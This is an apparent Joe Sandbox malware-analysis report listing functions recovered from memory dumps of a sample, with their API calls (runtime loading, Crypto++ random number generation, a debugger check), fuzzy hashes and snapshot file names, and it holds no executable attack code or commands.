Instruction Fuzzy Hash: AA01F670D45609DECB40FFB988492AEBAF9BB49208F0089A9952DE3211FF744658CB91

Function 00D6D148 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986597710.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b34cb133bdf4833f38e82214b7cfd17d3eabf66ac1eb1bb24971db6d24bb850
Instruction ID: 0e57a47752e7b704675befd6e761d43a7f5572b06aeb0527c0b81c51a1a3a71a
Opcode Fuzzy Hash: 0b34cb133bdf4833f38e82214b7cfd17d3eabf66ac1eb1bb24971db6d24bb850
Instruction Fuzzy Hash: 2DF0C2715043449BE7208A0ADC84B62FFA8EF52334F1CC45AED085A286C2799840CAB1

Function 02A87FF0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace94969f1726813272863b0580f88e359809cc2898d87ce2460be2222252483
Instruction ID: 5e02029ed7338dc53b5580f7914dd5756a869600a8f20f9f437de8d700409ec6
Opcode Fuzzy Hash: ace94969f1726813272863b0580f88e359809cc2898d87ce2460be2222252483
Instruction Fuzzy Hash: DFD05B30C4D20CDFC704EF64D5445BCBBB8AB07315F805294D80E23362DF345955D699

Function 02A8FEA0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc0c8af85de28c2ad7dd68f45ebf85988ccf5d48e85f9de95a6387493ab5f28
Instruction ID: 1f76a28d41bc61e4bf19963348e9835772e9005db07f4cf00ef20969bae025dd
Opcode Fuzzy Hash: fbc0c8af85de28c2ad7dd68f45ebf85988ccf5d48e85f9de95a6387493ab5f28
Instruction Fuzzy Hash: D8E01774D1521CEFCB45EFB8E84969CBFF4AB04302F6041A9E808E3351EB305A90CB91

Function 02A80ED0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8912d3852418a4590de3e2e63b93a1ea2a90fe6701c95c939e55699b402c5af
Instruction ID: 0d27afbaecd6e918e5de5d23c0c818e8161adce01274a566671baaea127b2923
Opcode Fuzzy Hash: d8912d3852418a4590de3e2e63b93a1ea2a90fe6701c95c939e55699b402c5af
Instruction Fuzzy Hash: D8E0E274921208EFCB41EFA8E84969DBBB4AB04206F5041AA9808E3350EB309A94CB91

Function 02A8FDE0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc86672bcecb10f03f1cba877c121aeeee608ac3847c0070584d546176d6e334
Instruction ID: 3ab6c6bc3b49437273c7404cd5397531f5f387c6578050bb5d58d97872be22ca
Opcode Fuzzy Hash: cc86672bcecb10f03f1cba877c121aeeee608ac3847c0070584d546176d6e334
Instruction Fuzzy Hash: EED05E30802308EFC705FFA4E540A9DBFB5EF41305FA041A9D808A3750DB315E90DB95

Function 06EE2643 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15892f831a9b334967672299925ab3c3509cdd0d8a10cbbf92d0ea297f6fc245
Instruction ID: bd51d3146e445a5bb9402b0a33a063c697d543613175fc44cc7f76c2f67c65ec
Opcode Fuzzy Hash: 15892f831a9b334967672299925ab3c3509cdd0d8a10cbbf92d0ea297f6fc245
Instruction Fuzzy Hash: B0E0EC7095020ADFEB19DF65D4566AD7FF1EF84314F204529E002DA560DF794581CF91

Function 02A80838 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2436783505e4b256afe7ffcfca2aaca9d5c9ca905139bfb0c829dffc5b1db314
Instruction ID: 8fa6433902b196b054a364e271cd8f530678d96f39d1fef5933e9fbfab661aa8
Opcode Fuzzy Hash: 2436783505e4b256afe7ffcfca2aaca9d5c9ca905139bfb0c829dffc5b1db314
Instruction Fuzzy Hash: C7D0A7310042804FD7176F7878A83D03F604F2B311B0806D5E48CC7166D7154052D370

Function 02A89790 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa95deee4b755ea187a400b1aa29d804565eac7c585f782a062bd10587ec928f
Instruction ID: 1fe336971d36e1c594c3a61dc2e59db97ee96c50bf6ea288f90d00c02e8b9c3c
Opcode Fuzzy Hash: aa95deee4b755ea187a400b1aa29d804565eac7c585f782a062bd10587ec928f
Instruction Fuzzy Hash: 78D0A721005395CDD7125764B8183747EA4670231AF480152D44CC5FA3EBA500D0C272

Function 06EE266B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4abbf75f5a42890a97e339f94ffb00aac0d01fb01931219306bea7a9d99e250
Instruction ID: 567e36d63d019da8db22543ac9787999e3027085433934976229dd2ab295c911
Opcode Fuzzy Hash: f4abbf75f5a42890a97e339f94ffb00aac0d01fb01931219306bea7a9d99e250
Instruction Fuzzy Hash: 12D067B095430ADEEB148F51D0567AEBFB1AF44314F204519E101AA540CB7A4185CBC0

Function 02A80848 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68be1517b3acdcdec798d4d19dac7c322b7d5a00d2704f083bbc27fad3559a17
Instruction ID: 12fd9007fcca15c2f2ee21724329960a18b1d61017233acbc6bb8ef922b3d7cd
Opcode Fuzzy Hash: 68be1517b3acdcdec798d4d19dac7c322b7d5a00d2704f083bbc27fad3559a17
Instruction Fuzzy Hash: EBB09231042708CADB166BA8B908764B6A86B0132BF880514A54C81662AFA190E4D6BA

Non-executed Functions

Function 6CEB2D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB2DFF
VariantInit.OLEAUT32(?), ref: 6CEB2E08
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB2E7E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB2EB5
VariantClear.OLEAUT32(?), ref: 6CEB2EC1

Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC88F
Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC895
Part of subcall function 6CEBC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC8A0
Part of subcall function 6CEBC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBC8D5
Part of subcall function 6CEBC850: VariantClear.OLEAUT32(?), ref: 6CEBC8E1

VariantClear.OLEAUT32(?), ref: 6CEB30D5
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB3550
VariantClear.OLEAUT32(?), ref: 6CEB3563
VariantClear.OLEAUT32(?), ref: 6CEB3569

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 7ec5c6c285ded46acfd3e3de168d76183b75a4b3b88b6257c9ceb7d47ca0fc51
Instruction ID: 73c154cf882534ebcd19e791a6185421988e45d32765a97ad98ca5a3d2208ce6
Opcode Fuzzy Hash: 7ec5c6c285ded46acfd3e3de168d76183b75a4b3b88b6257c9ceb7d47ca0fc51
Instruction Fuzzy Hash: E8526C71D012189FCB05DFA8C980BEEBBB5BF89308F258199E509BB751DB70A945CF90

Function 6CEAA0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON

Download Yara Rule

APIs

CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6CF20634,6CF20738,?), ref: 6CEAA119
GetModuleHandleW.KERNEL32(mscorwks), ref: 6CEAA145
__cftoe.LIBCMT ref: 6CEAA1FB
GetModuleHandleW.KERNEL32(?), ref: 6CEAA215
GetProcAddress.KERNEL32(00000000,00000018), ref: 6CEAA265

Strings

mscorwks, xrefs: 6CEAA140
v2.0.50727, xrefs: 6CEAA110
wks, xrefs: 6CEAA10B

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: 3b71c01bfa38552a9fdd1f32c1789b2f244c13999633114bd7e2911002764b37
Instruction ID: 13eed2a48cd6dd311c756aee7d230a9936ff24d2bbd8aaee2f180665ebe23d51
Opcode Fuzzy Hash: 3b71c01bfa38552a9fdd1f32c1789b2f244c13999633114bd7e2911002764b37
Instruction Fuzzy Hash: 619169B1E052499FCB04DFE8C880A9EBBB5FF49314F20866DE159EB740D7359906CB94

Function 6CEEDBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,67D4BDE6,6CF18180,00000000,?), ref: 6CEEDBFB
GetLastError.KERNEL32 ref: 6CEEDC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CEEDC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CEEDC26
SetLastError.KERNEL32(00000000), ref: 6CEEDC2D

Part of subcall function 6CEED9D0: GetLastError.KERNEL32(00000010,67D4BDE6,7508FC30,?,00000000), ref: 6CEEDA1A

__CxxThrowException@8.LIBCMT ref: 6CEEDC78

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

CryptAcquireContext, xrefs: 6CEEDC35
Crypto++ RNG, xrefs: 6CEEDC0D, 6CEEDC20

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 39e45279941e8351587ba849aeb7e7f4060b0298daaef6061419886e8bfa9c1f
Instruction ID: d09885867aec086a941cec2d56eea8d9b43a9636c01df78eaea215f4995150d9
Opcode Fuzzy Hash: 39e45279941e8351587ba849aeb7e7f4060b0298daaef6061419886e8bfa9c1f
Instruction Fuzzy Hash: F7210BB225C300AFD310DB25CC45F977BF8EB89798F11091EF54196AC0DBB6E5088791

Function 6CEF948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6CEFCE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CEFCE81
UnhandledExceptionFilter.KERNEL32(6CF19428), ref: 6CEFCE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6CEFCEA8
TerminateProcess.KERNEL32(00000000), ref: 6CEFCEAF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 82e33c5cd0c7781d6efd3907c225ab12ab868b3cdb5b7fe17121586ff5ca21a5
Instruction ID: 619e14b6115c6eb0f83c651ef37447ae80d5ff0ab1fe87516ba6f835f07e5586
Opcode Fuzzy Hash: 82e33c5cd0c7781d6efd3907c225ab12ab868b3cdb5b7fe17121586ff5ca21a5
Instruction Fuzzy Hash: 3121EFB4E25A04EFCFB8DF19D0697443BB6FB4A308F20485AEC0D87B40E7B049818B95

Function 6CEF2310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CEF24A1

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

std::exception::exception.LIBCMT ref: 6CEF248C

Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: bcbf2940a1ba905d073ec12232a87fe7ae24c8bad15b939dcf0b19fd912ea5a1
Instruction ID: e07ef759d3fa5fce949a642b4de929f6f70fc1fb5afcbcde9d6e32c02acfe331
Opcode Fuzzy Hash: bcbf2940a1ba905d073ec12232a87fe7ae24c8bad15b939dcf0b19fd912ea5a1
Instruction Fuzzy Hash: 17329671A0164A8FDB04CFA8C494A9EB7B5FF99708F34411CE4269BB50E731ED06CBA1

Function 6CEE5DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03333504f3f2bf9ad53faf0204689954fa596c3c9df66b96ef08ea6e61a7440
Instruction ID: 42e8842d8a89ef704099c83652ac72ab1115732f68d9873135008059f210feac
Opcode Fuzzy Hash: a03333504f3f2bf9ad53faf0204689954fa596c3c9df66b96ef08ea6e61a7440
Instruction Fuzzy Hash: 9D02A2B0A287549FC794CF29C4B063EBBF2EBCA311F41090EE5F95B251C238A559CB65

Function 6CEE5EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CEE62FC
_memmove.LIBCMT ref: 6CEE632B
_memmove.LIBCMT ref: 6CEE635A
_memmove.LIBCMT ref: 6CEE6389

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b47d0beed67e7f9cc52f1ed90c71f09bf3d2887c0e5d9d8c713cdfd4f816553d
Instruction ID: 8790dda0477be35bfd516f034c740f3914444caad70fb9e8f5935143ce07dfb8
Opcode Fuzzy Hash: b47d0beed67e7f9cc52f1ed90c71f09bf3d2887c0e5d9d8c713cdfd4f816553d
Instruction Fuzzy Hash: 95E191B0A287549FC794CB69C8B023E7FF2E7CA211F41090EE1F95B291D238A159CB65

Function 06EE0930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

LOOK, xrefs: 06EE09B1
HERE, xrefs: 06EE09B6
Guq, xrefs: 06EE0BBB
Guq, xrefs: 06EE0D19

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: HERE$LOOK$Guq$Guq
API String ID: 0-1031546151
Opcode ID: b918ce297758546e21b97f0edd3ce9205f0f62ce843eb44d083900c07c87c012
Instruction ID: 66f1afa516325e9612b2aaccd7f36c25d6e2a20fbf23be9ef2809f5e6aaa7ed6
Opcode Fuzzy Hash: b918ce297758546e21b97f0edd3ce9205f0f62ce843eb44d083900c07c87c012
Instruction Fuzzy Hash: B0F1AF74E412298FDBA4DF69C984BDDBBF5BB48310F1082E6D40DA7255DB70AE818F90

Function 6CEEDE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?,67D4BDE6,00000000), ref: 6CEEDE6F
__CxxThrowException@8.LIBCMT ref: 6CEEDEB9

Part of subcall function 6CEEDD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CF0F0E6,000000FF,6CEEDF67,00000000,?), ref: 6CEEDDB4

Strings

CryptGenRandom, xrefs: 6CEEDE7B

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: dcbb65c29924e4cf1ce60df255b934a0d42755e2f7bbc61efe2e36d2227b8828
Instruction ID: 42dcb83de3c8f33f0f8375412522a12d5d13555b1c7ac9b6b7119f6929a35c3a
Opcode Fuzzy Hash: dcbb65c29924e4cf1ce60df255b934a0d42755e2f7bbc61efe2e36d2227b8828
Instruction Fuzzy Hash: 9D214D75518740AFC710DF24C454B9ABBF5FB89758F104A0EF8A587B80E775E508CB92

Function 6CEE63B0 Relevance: 5.1, APIs: 3, Instructions: 648COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CEE6437

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7752d67448edbc0d3cf88625accb91977ec6a7f0d423a84320446f7752673a98
Instruction ID: 1116111ad5f03ceebbc71e30c5a288f8dc0c7a8332499d4392b812a3b0463ff3
Opcode Fuzzy Hash: 7752d67448edbc0d3cf88625accb91977ec6a7f0d423a84320446f7752673a98
Instruction Fuzzy Hash: B05233706146698FC794CF2AC0A0626BBF2EFCE311755854ED8CA9B78AD334F552CB90

Function 6CEED9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,67D4BDE6,7508FC30,?,00000000), ref: 6CEEDA1A

